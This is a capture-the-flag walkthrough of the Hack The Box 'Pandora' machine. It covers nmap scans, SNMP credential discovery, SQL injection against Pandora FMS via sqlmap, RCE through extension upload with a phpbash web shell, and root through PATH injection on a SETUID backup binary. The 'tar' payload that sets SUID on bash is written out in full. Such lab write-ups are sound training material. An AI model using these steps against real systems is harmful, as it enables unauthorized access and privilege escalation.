
Open Ports Enumeration


22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPIYGoHvNFwTTboYexVGcZzbSLJQsxKopZqrHVTeF8oEIu0iqn7E5czwVkxRO/icqaDqM+AB3QQVcZSDaz//XoXsT/NzNIbb9SERrcK/n8n9or4IbXBEtXhRvltS8NABsOTuhiNo/2fdPYCVJ/HyF5YmbmtqUPols6F5y/MK2Yl3eLMOdQQeax4AWSKVAsR+issSZlN2rADIvpboV7YMoo3ktlHKz4hXlX6FWtfDN/ZyokDNNpgBbr7N8zJ87+QfmNuuGgmcZzxhnzJOzihBHIvdIM4oMm4IetfquYm1WKG3s5q70jMFrjp4wCyEVbxY+DcJ54xjqbaNHhVwiSWUZnAyWe4gQGziPdZH2ULY+n3iTze+8E4a6rxN3l38d1r4THoru88G56QESiy/jQ8m5+Ang77rSEaT3Fnr6rnAF5VG1+kiA36rMIwLabnxQbAWnApRX9CHBpMdBj7v8oLhCRn7ZEoPDcD1P2AASdaDJjRMuR52YPDlUSDd8TnI/DFFs=
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w=
|   256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB84


sudo nmap -sU pandora.htb --min-rate=10000 -vv -oN nmap_udp.txt

Looks like SNMP is running. we shall enumerate it!

sudo nmap -sU -sV pandora.htb -p161 -vv

161/udp open  snmp    udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: pandora

Web Enumeration

Sub Domain Enumeration

Found no subdomains

Directory Enumeration

Found no useful directory

SNMP Enumeration

snmpwalk -c public -v2c | tee snmp.out

Found the credentials for the user daniel



I used the same credentials to SSH into the machine

Pandora Console

I found something being hosted locally, lets port forward it using SSH

ssh [email protected] -L 80:

Login attempt

It seems like daniel has access to API only! Let’s try to mess it up after reading documentation.

If we notice below the website the version can be found to be Pandora FMS v7.4.2

It seems to be vulnerable to many things. Let’s try SQL injection as per the article.

Exploiting SQL Injection

The website is vulnerable to []( endpoint. Lets run it in SQLMAP.

So SQL Injection was a success! Let’s exfil data from the Database.

Use --dbs flag to list the databases available in the DBMS.

We have pandora DB, lets check the tables

Use -D pandora --tables flag to list the tables and we have quite a lot of tables.

tpassword_history table had interesting info, it had the password for the Pandora FMS’s admin password.

After logging in, lets exploit the extension upload vulnerability as described in the same article.

I got RCE as Matt. We have got user flag!

If you are wondering what is the shell in browser, it is phpbash. I zipped the file and uploaded it and then executed the file.

Privilege Escalation

I found a custom binary to be present /usr/bin/pandora_backup . I did strings on the binary and found it ran a command.

If you noticed that command, you’d have notice how vulnerable it is. Moreover the binary is SETUID binary. So its path injection.

Exploiting Path Injection

Will first Create a file named tar

and have its payload the following manner


chmod u+s /bin/bash 
/bin/bash -p

and then chmod +x tar now export the path export PATH=.:$PATH

Now run the binary and you’ll have got the root shell

Root shell owned!

P.S Try to have shell in SSH when u are matt.